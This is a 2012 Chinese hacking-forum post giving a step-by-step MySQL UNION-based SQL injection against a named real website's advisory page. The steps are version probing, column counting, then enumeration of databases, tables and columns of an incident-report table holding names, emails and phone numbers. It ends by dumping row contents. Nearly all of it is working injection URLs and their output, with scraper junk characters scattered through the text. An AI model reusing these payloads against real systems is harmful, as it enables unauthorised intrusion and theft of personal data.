中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]

作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询- U( L( `! t- [" ^
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解: R/ z4 P8 z) e* H7 v
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
; E/ b7 ~& Y9 C) H% W3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--- k; ], w9 b9 H+ _# K8 z4 P2 D
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。3 N8 _  p6 j6 _! n( k
4.判断有没有写权限) p* }! [0 N6 m) w
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
) w0 h  J' B; r% k1 e没办法,手动猜表啦
" t! |1 y. g1 R8 L! y8 `5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
( ]2 V- D, y/ p3 \4 O8 `+ O4 X0 m但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下& D; b! r0 Z' E; U
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
3 G& y2 \; l3 _, d8 ~# P+ v6 U& E7 n成功查出所有数据库,国外的黑客就是不一般。数据库如下:
1 |- a1 b+ q4 v% t% D6 j/ c5 q; D: O( cinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
8 g2 M  q) x& V# N6.爆表,爆的是twcert库
, K) u" W8 s' I. Y0 [5 ~! ?http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--: I1 |4 ^  Y; @( g7 O1 J
爆出如下表+ e2 M# e- s9 \% M, J
downloadfile,irsys,newsdata,secrpt,secrpt_big5" w) F. ~/ o5 M/ H3 |+ W* e; j
7.爆列名,这次爆的是irsys表0 ]* X/ m; w- e0 G# g/ e
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. T% J4 D6 b8 U  r- Q  K- ?爆出如下列: p7 x( e7 ~0 s2 s4 q/ ^
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 h6 i  r' p5 _, N, O  l0 u1 }# ^0 _8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
# r. q1 D) X, Z, h3 Ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--! U6 z" S! q( |/ k
返回是3,说明每个列里有3个地段
. o) Y- f4 G7 L3 W9.爆字段内容
9 m) q( p, G# f+ Yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
1 K+ ]; N7 v' C爆出name列的第一个字段的内容6 V( T$ ~$ g' V/ K+ w  t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--0 V4 t7 a' w1 ^: _
爆出name列的第二个字段的内容




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2